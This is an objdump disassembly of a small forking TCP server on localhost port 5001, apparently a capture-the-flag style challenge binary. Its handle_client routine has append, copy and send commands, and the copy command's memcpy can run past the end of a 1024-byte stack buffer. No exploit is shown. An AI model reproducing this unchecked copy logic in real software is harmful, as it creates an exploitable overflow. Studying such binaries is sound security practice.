    114f:	4c 8d 05 9a 05 00 00 	lea    0x59a(%rip),%r8        # 16f0 <__libc_csu_fini>
    1156:	48 8d 0d 33 05 00 00 	lea    0x533(%rip),%rcx        # 1690 <__libc_csu_init>
    115d:	48 8d 3d 04 03 00 00 	lea    0x304(%rip),%rdi        # 1468 <main>
    1164:	ff 15 76 2e 00 00    	callq  *0x2e76(%rip)        # 3fe0 <__libc_start_main@GLIBC_2.2.5>
    116a:	f4                   	hlt    
    116b:	0f 1f 44 00 00       	nopl   0x0(%rax,%rax,1)

0000000000001170 <deregister_tm_clones>:
    1170:	48 8d 3d 99 2e 00 00 	lea    0x2e99(%rip),%rdi        # 4010 <__TMC_END__>
    1177:	48 8d 05 92 2e 00 00 	lea    0x2e92(%rip),%rax        # 4010 <__TMC_END__>
    117e:	48 39 f8             	cmp    %rdi,%rax
    1181:	74 15                	je     1198 <deregister_tm_clones+0x28>
    1183:	48 8b 05 4e 2e 00 00 	mov    0x2e4e(%rip),%rax        # 3fd8 <_ITM_deregisterTMCloneTable>
    118a:	48 85 c0             	test   %rax,%rax
    118d:	74 09                	je     1198 <deregister_tm_clones+0x28>
    118f:	ff e0                	jmpq   *%rax
    1191:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)
    1198:	c3                   	retq   
    1199:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)

00000000000011a0 <register_tm_clones>:
    11a0:	48 8d 3d 69 2e 00 00 	lea    0x2e69(%rip),%rdi        # 4010 <__TMC_END__>
    11a7:	48 8d 35 62 2e 00 00 	lea    0x2e62(%rip),%rsi        # 4010 <__TMC_END__>
    11ae:	48 29 fe             	sub    %rdi,%rsi
    11b1:	48 89 f0             	mov    %rsi,%rax
    11b4:	48 c1 ee 3f          	shr    $0x3f,%rsi
    11b8:	48 c1 f8 03          	sar    $0x3,%rax
    11bc:	48 01 c6             	add    %rax,%rsi
    11bf:	48 d1 fe             	sar    %rsi
    11c2:	74 14                	je     11d8 <register_tm_clones+0x38>
    11c4:	48 8b 05 25 2e 00 00 	mov    0x2e25(%rip),%rax        # 3ff0 <_ITM_registerTMCloneTable>
    11cb:	48 85 c0             	test   %rax,%rax
    11ce:	74 08                	je     11d8 <register_tm_clones+0x38>
    11d0:	ff e0                	jmpq   *%rax
    11d2:	66 0f 1f 44 00 00    	nopw   0x0(%rax,%rax,1)
    11d8:	c3                   	retq   
    11d9:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)

00000000000011e0 <__do_global_dtors_aux>:
    11e0:	80 3d 29 2e 00 00 00 	cmpb   $0x0,0x2e29(%rip)        # 4010 <__TMC_END__>
    11e7:	75 2f                	jne    1218 <__do_global_dtors_aux+0x38>
    11e9:	55                   	push   %rbp
    11ea:	48 83 3d 06 2e 00 00 	cmpq   $0x0,0x2e06(%rip)        # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    11f1:	00 
    11f2:	48 89 e5             	mov    %rsp,%rbp
    11f5:	74 0c                	je     1203 <__do_global_dtors_aux+0x23>
    11f7:	48 8b 3d 0a 2e 00 00 	mov    0x2e0a(%rip),%rdi        # 4008 <__dso_handle>
    11fe:	e8 2d ff ff ff       	callq  1130 <__cxa_finalize@plt>
    1203:	e8 68 ff ff ff       	callq  1170 <deregister_tm_clones>
    1208:	c6 05 01 2e 00 00 01 	movb   $0x1,0x2e01(%rip)        # 4010 <__TMC_END__>
    120f:	5d                   	pop    %rbp
    1210:	c3                   	retq   
    1211:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)
    1218:	c3                   	retq   
    1219:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)

0000000000001220 <frame_dummy>:
    1220:	e9 7b ff ff ff       	jmpq   11a0 <register_tm_clones>

0000000000001225 <handle_client>:
    1225:	55                   	push   %rbp
    1226:	48 89 e5             	mov    %rsp,%rbp
    1229:	48 81 ec 30 04 00 00 	sub    $0x430,%rsp
    1230:	89 bd dc fb ff ff    	mov    %edi,-0x424(%rbp)
    1236:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    123d:	00 00 
    123f:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
    1243:	31 c0                	xor    %eax,%eax
    1245:	66 c7 85 ee fb ff ff 	movw   $0x0,-0x412(%rbp)
    124c:	00 00 
    124e:	48 8d 8d e9 fb ff ff 	lea    -0x417(%rbp),%rcx
    1255:	8b 85 dc fb ff ff    	mov    -0x424(%rbp),%eax
    125b:	ba 01 00 00 00       	mov    $0x1,%edx
    1260:	48 89 ce             	mov    %rcx,%rsi
    1263:	89 c7                	mov    %eax,%edi
    1265:	e8 26 fe ff ff       	callq  1090 <read@plt>
    126a:	48 83 f8 01          	cmp    $0x1,%rax
    126e:	74 0a                	je     127a <handle_client+0x55>
    1270:	bf 01 00 00 00       	mov    $0x1,%edi
    1275:	e8 86 fe ff ff       	callq  1100 <exit@plt>
    127a:	0f b6 85 e9 fb ff ff 	movzbl -0x417(%rbp),%eax
    1281:	0f b6 c0             	movzbl %al,%eax
    1284:	83 f8 03             	cmp    $0x3,%eax
    1287:	0f 84 9f 01 00 00    	je     142c <handle_client+0x207>
    128d:	83 f8 03             	cmp    $0x3,%eax
    1290:	7f bc                	jg     124e <handle_client+0x29>
    1292:	83 f8 01             	cmp    $0x1,%eax
    1295:	74 0e                	je     12a5 <handle_client+0x80>
    1297:	83 f8 02             	cmp    $0x2,%eax
    129a:	0f 84 b1 00 00 00    	je     1351 <handle_client+0x12c>
    12a0:	e9 b7 01 00 00       	jmpq   145c <handle_client+0x237>
    12a5:	48 8d 8d ea fb ff ff 	lea    -0x416(%rbp),%rcx
    12ac:	8b 85 dc fb ff ff    	mov    -0x424(%rbp),%eax
    12b2:	ba 01 00 00 00       	mov    $0x1,%edx
    12b7:	48 89 ce             	mov    %rcx,%rsi
    12ba:	89 c7                	mov    %eax,%edi
    12bc:	e8 cf fd ff ff       	callq  1090 <read@plt>
    12c1:	48 83 f8 01          	cmp    $0x1,%rax
    12c5:	74 0a                	je     12d1 <handle_client+0xac>
    12c7:	bf 01 00 00 00       	mov    $0x1,%edi
    12cc:	e8 2f fe ff ff       	callq  1100 <exit@plt>
    12d1:	0f b7 95 ee fb ff ff 	movzwl -0x412(%rbp),%edx
    12d8:	0f b6 85 ea fb ff ff 	movzbl -0x416(%rbp),%eax
    12df:	0f b6 c0             	movzbl %al,%eax
    12e2:	01 d0                	add    %edx,%eax
    12e4:	3d 00 04 00 00       	cmp    $0x400,%eax
    12e9:	7e 0a                	jle    12f5 <handle_client+0xd0>
    12eb:	bf 01 00 00 00       	mov    $0x1,%edi
    12f0:	e8 0b fe ff ff       	callq  1100 <exit@plt>
    12f5:	0f b6 85 ea fb ff ff 	movzbl -0x416(%rbp),%eax
    12fc:	0f b6 d0             	movzbl %al,%edx
    12ff:	0f b7 85 ee fb ff ff 	movzwl -0x412(%rbp),%eax
    1306:	48 8d 8d f0 fb ff ff 	lea    -0x410(%rbp),%rcx
    130d:	48 98                	cltq   
    130f:	48 01 c1             	add    %rax,%rcx
    1312:	8b 85 dc fb ff ff    	mov    -0x424(%rbp),%eax
    1318:	48 89 ce             	mov    %rcx,%rsi
    131b:	89 c7                	mov    %eax,%edi
    131d:	e8 6e fd ff ff       	callq  1090 <read@plt>
    1322:	0f b6 95 ea fb ff ff 	movzbl -0x416(%rbp),%edx
    1329:	0f b6 d2             	movzbl %dl,%edx
    132c:	48 39 d0             	cmp    %rdx,%rax
    132f:	74 0a                	je     133b <handle_client+0x116>
    1331:	bf 01 00 00 00       	mov    $0x1,%edi
    1336:	e8 c5 fd ff ff       	callq  1100 <exit@plt>
    133b:	0f b6 85 ea fb ff ff 	movzbl -0x416(%rbp),%eax
    1342:	0f b6 c0             	movzbl %al,%eax
    1345:	66 01 85 ee fb ff ff 	add    %ax,-0x412(%rbp)
    134c:	e9 0b 01 00 00       	jmpq   145c <handle_client+0x237>
    1351:	48 8d 8d ec fb ff ff 	lea    -0x414(%rbp),%rcx
    1358:	8b 85 dc fb ff ff    	mov    -0x424(%rbp),%eax
    135e:	ba 02 00 00 00       	mov    $0x2,%edx
    1363:	48 89 ce             	mov    %rcx,%rsi
    1366:	89 c7                	mov    %eax,%edi
    1368:	e8 23 fd ff ff       	callq  1090 <read@plt>
    136d:	48 83 f8 02          	cmp    $0x2,%rax
    1371:	74 0a                	je     137d <handle_client+0x158>
    1373:	bf 01 00 00 00       	mov    $0x1,%edi
    1378:	e8 83 fd ff ff       	callq  1100 <exit@plt>
    137d:	0f b7 85 ec fb ff ff 	movzwl -0x414(%rbp),%eax
    1384:	66 39 85 ee fb ff ff 	cmp    %ax,-0x412(%rbp)
    138b:	73 0a                	jae    1397 <handle_client+0x172>
    138d:	bf 01 00 00 00       	mov    $0x1,%edi
    1392:	e8 69 fd ff ff       	callq  1100 <exit@plt>
    1397:	48 8d 8d eb fb ff ff 	lea    -0x415(%rbp),%rcx
    139e:	8b 85 dc fb ff ff    	mov    -0x424(%rbp),%eax
    13a4:	ba 01 00 00 00       	mov    $0x1,%edx
    13a9:	48 89 ce             	mov    %rcx,%rsi
    13ac:	89 c7                	mov    %eax,%edi
    13ae:	e8 dd fc ff ff       	callq  1090 <read@plt>
    13b3:	48 83 f8 01          	cmp    $0x1,%rax
    13b7:	74 0a                	je     13c3 <handle_client+0x19e>
    13b9:	bf 01 00 00 00       	mov    $0x1,%edi
    13be:	e8 3d fd ff ff       	callq  1100 <exit@plt>
    13c3:	66 81 bd ee fb ff ff 	cmpw   $0x400,-0x412(%rbp)
    13ca:	00 04 
    13cc:	76 0a                	jbe    13d8 <handle_client+0x1b3>
    13ce:	bf 01 00 00 00       	mov    $0x1,%edi
    13d3:	e8 28 fd ff ff       	callq  1100 <exit@plt>
    13d8:	0f b6 85 eb fb ff ff 	movzbl -0x415(%rbp),%eax
    13df:	0f b6 c0             	movzbl %al,%eax
    13e2:	0f b7 95 ec fb ff ff 	movzwl -0x414(%rbp),%edx
    13e9:	0f b7 d2             	movzwl %dx,%edx
    13ec:	48 8d 8d f0 fb ff ff 	lea    -0x410(%rbp),%rcx
    13f3:	48 63 d2             	movslq %edx,%rdx
    13f6:	48 8d 34 11          	lea    (%rcx,%rdx,1),%rsi
    13fa:	0f b7 95 ee fb ff ff 	movzwl -0x412(%rbp),%edx
    1401:	48 8d 8d f0 fb ff ff 	lea    -0x410(%rbp),%rcx
    1408:	48 63 d2             	movslq %edx,%rdx
    140b:	48 01 d1             	add    %rdx,%rcx
    140e:	48 89 c2             	mov    %rax,%rdx
    1411:	48 89 cf             	mov    %rcx,%rdi
    1414:	e8 97 fc ff ff       	callq  10b0 <memcpy@plt>
    1419:	0f b6 85 eb fb ff ff 	movzbl -0x415(%rbp),%eax
    1420:	0f b6 c0             	movzbl %al,%eax
    1423:	66 01 85 ee fb ff ff 	add    %ax,-0x412(%rbp)
    142a:	eb 30                	jmp    145c <handle_client+0x237>
    142c:	0f b7 95 ee fb ff ff 	movzwl -0x412(%rbp),%edx
    1433:	48 8d 8d f0 fb ff ff 	lea    -0x410(%rbp),%rcx
    143a:	8b 85 dc fb ff ff    	mov    -0x424(%rbp),%eax
    1440:	48 89 ce             	mov    %rcx,%rsi
    1443:	89 c7                	mov    %eax,%edi
    1445:	e8 06 fc ff ff       	callq  1050 <write@plt>
    144a:	90                   	nop
    144b:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
    144f:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    1456:	00 00 
    1458:	74 0c                	je     1466 <handle_client+0x241>
    145a:	eb 05                	jmp    1461 <handle_client+0x23c>
    145c:	e9 ed fd ff ff       	jmpq   124e <handle_client+0x29>
    1461:	e8 fa fb ff ff       	callq  1060 <__stack_chk_fail@plt>
    1466:	c9                   	leaveq 
    1467:	c3                   	retq   

0000000000001468 <main>:
    1468:	55                   	push   %rbp
    1469:	48 89 e5             	mov    %rsp,%rbp
    146c:	48 81 ec f0 00 00 00 	sub    $0xf0,%rsp
    1473:	89 bd 1c ff ff ff    	mov    %edi,-0xe4(%rbp)
    1479:	48 89 b5 10 ff ff ff 	mov    %rsi,-0xf0(%rbp)
    1480:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    1487:	00 00 
    1489:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
    148d:	31 c0                	xor    %eax,%eax
    148f:	48 8d 95 60 ff ff ff 	lea    -0xa0(%rbp),%rdx
    1496:	b8 00 00 00 00       	mov    $0x0,%eax
    149b:	b9 13 00 00 00       	mov    $0x13,%ecx
    14a0:	48 89 d7             	mov    %rdx,%rdi
    14a3:	f3 48 ab             	rep stos %rax,%es:(%rdi)
    14a6:	c7 45 e8 02 00 00 00 	movl   $0x2,-0x18(%rbp)
    14ad:	48 8d 85 60 ff ff ff 	lea    -0xa0(%rbp),%rax
    14b4:	ba 00 00 00 00       	mov    $0x0,%edx
    14b9:	48 89 c6             	mov    %rax,%rsi
    14bc:	bf 11 00 00 00       	mov    $0x11,%edi
    14c1:	e8 6a fb ff ff       	callq  1030 <sigaction@plt>
    14c6:	ba 00 00 00 00       	mov    $0x0,%edx
    14cb:	be 01 00 00 00       	mov    $0x1,%esi
    14d0:	bf 02 00 00 00       	mov    $0x2,%edi
    14d5:	e8 46 fc ff ff       	callq  1120 <socket@plt>
    14da:	89 85 30 ff ff ff    	mov    %eax,-0xd0(%rbp)
    14e0:	83 bd 30 ff ff ff 00 	cmpl   $0x0,-0xd0(%rbp)
    14e7:	79 16                	jns    14ff <main+0x97>
    14e9:	48 8d 3d 18 0b 00 00 	lea    0xb18(%rip),%rdi        # 2008 <_IO_stdin_used+0x8>
    14f0:	e8 eb fb ff ff       	callq  10e0 <perror@plt>
    14f5:	bf 01 00 00 00       	mov    $0x1,%edi
    14fa:	e8 01 fc ff ff       	callq  1100 <exit@plt>
    14ff:	c7 85 2c ff ff ff 01 	movl   $0x1,-0xd4(%rbp)
    1506:	00 00 00 
    1509:	48 8d 95 2c ff ff ff 	lea    -0xd4(%rbp),%rdx
    1510:	8b 85 30 ff ff ff    	mov    -0xd0(%rbp),%eax
    1516:	41 b8 04 00 00 00    	mov    $0x4,%r8d
    151c:	48 89 d1             	mov    %rdx,%rcx
    151f:	ba 02 00 00 00       	mov    $0x2,%edx
    1524:	be 01 00 00 00       	mov    $0x1,%esi
    1529:	89 c7                	mov    %eax,%edi
    152b:	e8 10 fb ff ff       	callq  1040 <setsockopt@plt>
    1530:	85 c0                	test   %eax,%eax
    1532:	79 0c                	jns    1540 <main+0xd8>
    1534:	48 8d 3d e5 0a 00 00 	lea    0xae5(%rip),%rdi        # 2020 <_IO_stdin_used+0x20>
    153b:	e8 a0 fb ff ff       	callq  10e0 <perror@plt>
    1540:	48 8d 85 40 ff ff ff 	lea    -0xc0(%rbp),%rax
    1547:	48 c7 00 00 00 00 00 	movq   $0x0,(%rax)
    154e:	48 c7 40 08 00 00 00 	movq   $0x0,0x8(%rax)
    1555:	00 
    1556:	c7 85 34 ff ff ff 89 	movl   $0x1389,-0xcc(%rbp)
    155d:	13 00 00 
    1560:	66 c7 85 40 ff ff ff 	movw   $0x2,-0xc0(%rbp)
    1567:	02 00 
    1569:	48 8d 3d d0 0a 00 00 	lea    0xad0(%rip),%rdi        # 2040 <_IO_stdin_used+0x40>
    1570:	e8 2b fb ff ff       	callq  10a0 <inet_addr@plt>
    1575:	89 85 44 ff ff ff    	mov    %eax,-0xbc(%rbp)
    157b:	8b 85 34 ff ff ff    	mov    -0xcc(%rbp),%eax
    1581:	0f b7 c0             	movzwl %ax,%eax
    1584:	89 c7                	mov    %eax,%edi
    1586:	e8 e5 fa ff ff       	callq  1070 <htons@plt>
    158b:	66 89 85 42 ff ff ff 	mov    %ax,-0xbe(%rbp)
    1592:	48 8d 8d 40 ff ff ff 	lea    -0xc0(%rbp),%rcx
    1599:	8b 85 30 ff ff ff    	mov    -0xd0(%rbp),%eax
    159f:	ba 10 00 00 00       	mov    $0x10,%edx
    15a4:	48 89 ce             	mov    %rcx,%rsi
    15a7:	89 c7                	mov    %eax,%edi
    15a9:	e8 22 fb ff ff       	callq  10d0 <bind@plt>
    15ae:	85 c0                	test   %eax,%eax
    15b0:	79 16                	jns    15c8 <main+0x160>
    15b2:	48 8d 3d 91 0a 00 00 	lea    0xa91(%rip),%rdi        # 204a <_IO_stdin_used+0x4a>
    15b9:	e8 22 fb ff ff       	callq  10e0 <perror@plt>
    15be:	bf 01 00 00 00       	mov    $0x1,%edi
    15c3:	e8 38 fb ff ff       	callq  1100 <exit@plt>
    15c8:	8b 85 30 ff ff ff    	mov    -0xd0(%rbp),%eax
    15ce:	be 05 00 00 00       	mov    $0x5,%esi
    15d3:	89 c7                	mov    %eax,%edi
    15d5:	e8 e6 fa ff ff       	callq  10c0 <listen@plt>
    15da:	c7 85 2c ff ff ff 10 	movl   $0x10,-0xd4(%rbp)
    15e1:	00 00 00 
    15e4:	48 8d 95 2c ff ff ff 	lea    -0xd4(%rbp),%rdx
    15eb:	48 8d 8d 50 ff ff ff 	lea    -0xb0(%rbp),%rcx
    15f2:	8b 85 30 ff ff ff    	mov    -0xd0(%rbp),%eax
    15f8:	48 89 ce             	mov    %rcx,%rsi
    15fb:	89 c7                	mov    %eax,%edi
    15fd:	e8 ee fa ff ff       	callq  10f0 <accept@plt>
    1602:	89 85 38 ff ff ff    	mov    %eax,-0xc8(%rbp)
    1608:	83 bd 38 ff ff ff 00 	cmpl   $0x0,-0xc8(%rbp)
    160f:	79 16                	jns    1627 <main+0x1bf>
    1611:	48 8d 3d 43 0a 00 00 	lea    0xa43(%rip),%rdi        # 205b <_IO_stdin_used+0x5b>
    1618:	e8 c3 fa ff ff       	callq  10e0 <perror@plt>
    161d:	bf 01 00 00 00       	mov    $0x1,%edi
    1622:	e8 d9 fa ff ff       	callq  1100 <exit@plt>
    1627:	e8 e4 fa ff ff       	callq  1110 <fork@plt>
    162c:	89 85 3c ff ff ff    	mov    %eax,-0xc4(%rbp)
    1632:	83 bd 3c ff ff ff 00 	cmpl   $0x0,-0xc4(%rbp)
    1639:	79 16                	jns    1651 <main+0x1e9>
    163b:	48 8d 3d 29 0a 00 00 	lea    0xa29(%rip),%rdi        # 206b <_IO_stdin_used+0x6b>
    1642:	e8 99 fa ff ff       	callq  10e0 <perror@plt>
    1647:	bf 01 00 00 00       	mov    $0x1,%edi
    164c:	e8 af fa ff ff       	callq  1100 <exit@plt>
    1651:	83 bd 3c ff ff ff 00 	cmpl   $0x0,-0xc4(%rbp)
    1658:	75 24                	jne    167e <main+0x216>
    165a:	8b 85 30 ff ff ff    	mov    -0xd0(%rbp),%eax
    1660:	89 c7                	mov    %eax,%edi
    1662:	e8 19 fa ff ff       	callq  1080 <close@plt>
    1667:	8b 85 38 ff ff ff    	mov    -0xc8(%rbp),%eax
    166d:	89 c7                	mov    %eax,%edi
    166f:	e8 b1 fb ff ff       	callq  1225 <handle_client>
    1674:	bf 00 00 00 00       	mov    $0x0,%edi
    1679:	e8 82 fa ff ff       	callq  1100 <exit@plt>
    167e:	8b 85 38 ff ff ff    	mov    -0xc8(%rbp),%eax
    1684:	89 c7                	mov    %eax,%edi
    1686:	e8 f5 f9 ff ff       	callq  1080 <close@plt>
    168b:	e9 54 ff ff ff       	jmpq   15e4 <main+0x17c>

0000000000001690 <__libc_csu_init>:
    1690:	41 57                	push   %r15
    1692:	4c 8d 3d a7 26 00 00 	lea    0x26a7(%rip),%r15        # 3d40 <__frame_dummy_init_array_entry>
    1699:	41 56                	push   %r14
    169b:	49 89 d6             	mov    %rdx,%r14
    169e:	41 55                	push   %r13
    16a0:	49 89 f5             	mov    %rsi,%r13
    16a3:	41 54                	push   %r12
    16a5:	41 89 fc             	mov    %edi,%r12d
    16a8:	55                   	push   %rbp
    16a9:	48 8d 2d 98 26 00 00 	lea    0x2698(%rip),%rbp        # 3d48 <__do_global_dtors_aux_fini_array_entry>
    16b0:	53                   	push   %rbx
    16b1:	4c 29 fd             	sub    %r15,%rbp
    16b4:	48 83 ec 08          	sub    $0x8,%rsp
    16b8:	e8 43 f9 ff ff       	callq  1000 <_init>
    16bd:	48 c1 fd 03          	sar    $0x3,%rbp
    16c1:	74 1b                	je     16de <__libc_csu_init+0x4e>
    16c3:	31 db                	xor    %ebx,%ebx
    16c5:	0f 1f 00             	nopl   (%rax)
    16c8:	4c 89 f2             	mov    %r14,%rdx
    16cb:	4c 89 ee             	mov    %r13,%rsi
    16ce:	44 89 e7             	mov    %r12d,%edi
    16d1:	41 ff 14 df          	callq  *(%r15,%rbx,8)
    16d5:	48 83 c3 01          	add    $0x1,%rbx
    16d9:	48 39 dd             	cmp    %rbx,%rbp
    16dc:	75 ea                	jne    16c8 <__libc_csu_init+0x38>
    16de:	48 83 c4 08          	add    $0x8,%rsp
    16e2:	5b                   	pop    %rbx
    16e3:	5d                   	pop    %rbp
    16e4:	41 5c                	pop    %r12
    16e6:	41 5d                	pop    %r13
    16e8:	41 5e                	pop    %r14
    16ea:	41 5f                	pop    %r15
    16ec:	c3                   	retq   
    16ed:	0f 1f 00             	nopl   (%rax)

00000000000016f0 <__libc_csu_fini>:
    16f0:	c3                   	retq   

Disassembly of section .fini:

00000000000016f4 <_fini>:
    16f4:	48 83 ec 08          	sub    $0x8,%rsp
    16f8:	48 83 c4 08          	add    $0x8,%rsp
    16fc:	c3                   	retq   

Disassembly of section .rodata:

0000000000002000 <_IO_stdin_used>:
    2000:	01 00                	add    %eax,(%rax)
    2002:	02 00                	add    (%rax),%al
    2004:	00 00                	add    %al,(%rax)
    2006:	00 00                	add    %al,(%rax)
    2008:	45 52                	rex.RB push %r10
    200a:	52                   	push   %rdx
    200b:	4f 52                	rex.WRXB push %r10
    200d:	20 6f 70             	and    %ch,0x70(%rdi)
    2010:	65 6e                	outsb  %gs:(%rsi),(%dx)
    2012:	69 6e 67 20 73 6f 63 	imul   $0x636f7320,0x67(%rsi),%ebp
    2019:	6b 65 74 00          	imul   $0x0,0x74(%rbp),%esp
    201d:	00 00                	add    %al,(%rax)
    201f:	00 73 65             	add    %dh,0x65(%rbx)
    2022:	74 73                	je     2097 <__GNU_EH_FRAME_HDR+0x1b>
    2024:	6f                   	outsl  %ds:(%rsi),(%dx)
    2025:	63 6b 6f             	movslq 0x6f(%rbx),%ebp
    2028:	70 74                	jo     209e <__GNU_EH_FRAME_HDR+0x22>
    202a:	28 53 4f             	sub    %dl,0x4f(%rbx)
    202d:	5f                   	pop    %rdi
    202e:	52                   	push   %rdx
    202f:	45 55                	rex.RB push %r13
    2031:	53                   	push   %rbx
    2032:	45                   	rex.RB
    2033:	41                   	rex.B
    2034:	44                   	rex.R
    2035:	44 52                	rex.R push %rdx
    2037:	29 20                	sub    %esp,(%rax)
    2039:	66 61                	data16 (bad) 
    203b:	69 6c 65 64 00 31 32 	imul   $0x37323100,0x64(%rbp,%riz,2),%ebp
    2042:	37 
    2043:	2e 30 2e             	xor    %ch,%cs:(%rsi)
    2046:	30 2e                	xor    %ch,(%rsi)
    2048:	31 00                	xor    %eax,(%rax)
    204a:	45 52                	rex.RB push %r10
    204c:	52                   	push   %rdx
    204d:	4f 52                	rex.WRXB push %r10
    204f:	20 6f 6e             	and    %ch,0x6e(%rdi)
    2052:	20 62 69             	and    %ah,0x69(%rdx)
    2055:	6e                   	outsb  %ds:(%rsi),(%dx)
    2056:	64 69 6e 67 00 45 52 	imul   $0x52524500,%fs:0x67(%rsi),%ebp
    205d:	52 
    205e:	4f 52                	rex.WRXB push %r10
    2060:	20 6f 6e             	and    %ch,0x6e(%rdi)
    2063:	20 61 63             	and    %ah,0x63(%rcx)
    2066:	63 65 70             	movslq 0x70(%rbp),%esp
    2069:	74 00                	je     206b <_IO_stdin_used+0x6b>
    206b:	45 52                	rex.RB push %r10
    206d:	52                   	push   %rdx
    206e:	4f 52                	rex.WRXB push %r10
    2070:	20 6f 6e             	and    %ch,0x6e(%rdi)
    2073:	20 66 6f             	and    %ah,0x6f(%rsi)
    2076:	72 6b                	jb     20e3 <__GNU_EH_FRAME_HDR+0x67>
	...

Disassembly of section .eh_frame_hdr:

000000000000207c <__GNU_EH_FRAME_HDR>:
    207c:	01 1b                	add    %ebx,(%rbx)
    207e:	03 3b                	add    (%rbx),%edi
    2080:	40 00 00             	add    %al,(%rax)
    2083:	00 07                	add    %al,(%rdi)
    2085:	00 00                	add    %al,(%rax)
    2087:	00 a4 ef ff ff 8c 00 	add    %ah,0x8cffff(%rdi,%rbp,8)
    208e:	00 00                	add    %al,(%rax)
    2090:	b4 f0                	mov    $0xf0,%ah
    2092:	ff                   	(bad)  
    2093:	ff b4 00 00 00 c4 f0 	pushq  -0xf3c0000(%rax,%rax,1)
    209a:	ff                   	(bad)  
    209b:	ff 5c 00 00          	lcall  *0x0(%rax,%rax,1)
    209f:	00 a9 f1 ff ff cc    	add    %ch,-0x3300000f(%rcx)
    20a5:	00 00                	add    %al,(%rax)
    20a7:	00 ec                	add    %ch,%ah
    20a9:	f3 ff                	repz (bad) 
    20ab:	ff                   	(bad)  
    20ac:	ec                   	in     (%dx),%al
    20ad:	00 00                	add    %al,(%rax)
    20af:	00 14 f6             	add    %dl,(%rsi,%rsi,8)
    20b2:	ff                   	(bad)  
    20b3:	ff 0c 01             	decl   (%rcx,%rax,1)
    20b6:	00 00                	add    %al,(%rax)
    20b8:	74 f6                	je     20b0 <__GNU_EH_FRAME_HDR+0x34>
    20ba:	ff                   	(bad)  
    20bb:	ff 54 01 00          	callq  *0x0(%rcx,%rax,1)
	...

Disassembly of section .eh_frame:

00000000000020c0 <__FRAME_END__-0x124>:
    20c0:	14 00                	adc    $0x0,%al
    20c2:	00 00                	add    %al,(%rax)
    20c4:	00 00                	add    %al,(%rax)
    20c6:	00 00                	add    %al,(%rax)
    20c8:	01 7a 52             	add    %edi,0x52(%rdx)
    20cb:	00 01                	add    %al,(%rcx)
    20cd:	78 10                	js     20df <__GNU_EH_FRAME_HDR+0x63>
    20cf:	01 1b                	add    %ebx,(%rbx)
    20d1:	0c 07                	or     $0x7,%al
    20d3:	08 90 01 07 10 14    	or     %dl,0x14100701(%rax)
    20d9:	00 00                	add    %al,(%rax)
    20db:	00 1c 00             	add    %bl,(%rax,%rax,1)
    20de:	00 00                	add    %al,(%rax)
    20e0:	60                   	(bad)  
    20e1:	f0 ff                	lock (bad) 
    20e3:	ff 2b                	ljmp   *(%rbx)
	...
    20ed:	00 00                	add    %al,(%rax)
    20ef:	00 14 00             	add    %dl,(%rax,%rax,1)
    20f2:	00 00                	add    %al,(%rax)
    20f4:	00 00                	add    %al,(%rax)
    20f6:	00 00                	add    %al,(%rax)
    20f8:	01 7a 52             	add    %edi,0x52(%rdx)
    20fb:	00 01                	add    %al,(%rcx)
    20fd:	78 10                	js     210f <__GNU_EH_FRAME_HDR+0x93>
    20ff:	01 1b                	add    %ebx,(%rbx)
    2101:	0c 07                	or     $0x7,%al
    2103:	08 90 01 00 00 24    	or     %dl,0x24000001(%rax)
    2109:	00 00                	add    %al,(%rax)
    210b:	00 1c 00             	add    %bl,(%rax,%rax,1)
    210e:	00 00                	add    %al,(%rax)
    2110:	10 ef                	adc    %ch,%bh
    2112:	ff                   	(bad)  
    2113:	ff 10                	callq  *(%rax)
    2115:	01 00                	add    %eax,(%rax)
    2117:	00 00                	add    %al,(%rax)
    2119:	0e                   	(bad)  
    211a:	10 46 0e             	adc    %al,0xe(%rsi)
    211d:	18 4a 0f             	sbb    %cl,0xf(%rdx)
    2120:	0b 77 08             	or     0x8(%rdi),%esi
    2123:	80 00 3f             	addb   $0x3f,(%rax)
    2126:	1a 3b                	sbb    (%rbx),%bh
    2128:	2a 33                	sub    (%rbx),%dh
    212a:	24 22                	and    $0x22,%al
    212c:	00 00                	add    %al,(%rax)
    212e:	00 00                	add    %al,(%rax)
    2130:	14 00                	adc    $0x0,%al
    2132:	00 00                	add    %al,(%rax)
    2134:	44 00 00             	add    %r8b,(%rax)
    2137:	00 f8                	add    %bh,%al
    2139:	ef                   	out    %eax,(%dx)
    213a:	ff                   	(bad)  
    213b:	ff 08                	decl   (%rax)
	...
    2145:	00 00                	add    %al,(%rax)
    2147:	00 1c 00             	add    %bl,(%rax,%rax,1)
    214a:	00 00                	add    %al,(%rax)
    214c:	5c                   	pop    %rsp
    214d:	00 00                	add    %al,(%rax)
    214f:	00 d5                	add    %dl,%ch
    2151:	f0 ff                	lock (bad) 
    2153:	ff 43 02             	incl   0x2(%rbx)
    2156:	00 00                	add    %al,(%rax)
    2158:	00 41 0e             	add    %al,0xe(%rcx)
    215b:	10 86 02 43 0d 06    	adc    %al,0x60d4302(%rsi)
    2161:	03 3e                	add    (%rsi),%edi
    2163:	02 0c 07             	add    (%rdi,%rax,1),%cl
    2166:	08 00                	or     %al,(%rax)
    2168:	1c 00                	sbb    $0x0,%al
    216a:	00 00                	add    %al,(%rax)
    216c:	7c 00                	jl     216e <__GNU_EH_FRAME_HDR+0xf2>
    216e:	00 00                	add    %al,(%rax)
    2170:	f8                   	clc    
    2171:	f2 ff                	repnz (bad) 
    2173:	ff 28                	ljmp   *(%rax)
    2175:	02 00                	add    (%rax),%al
    2177:	00 00                	add    %al,(%rax)
    2179:	41 0e                	rex.B (bad) 
    217b:	10 86 02 43 0d 06    	adc    %al,0x60d4302(%rsi)
    2181:	00 00                	add    %al,(%rax)
    2183:	00 00                	add    %al,(%rax)
    2185:	00 00                	add    %al,(%rax)
    2187:	00 44 00 00          	add    %al,0x0(%rax,%rax,1)
    218b:	00 9c 00 00 00 00 f5 	add    %bl,-0xb000000(%rax,%rax,1)
    2192:	ff                   	(bad)  
    2193:	ff 5d 00             	lcall  *0x0(%rbp)
    2196:	00 00                	add    %al,(%rax)
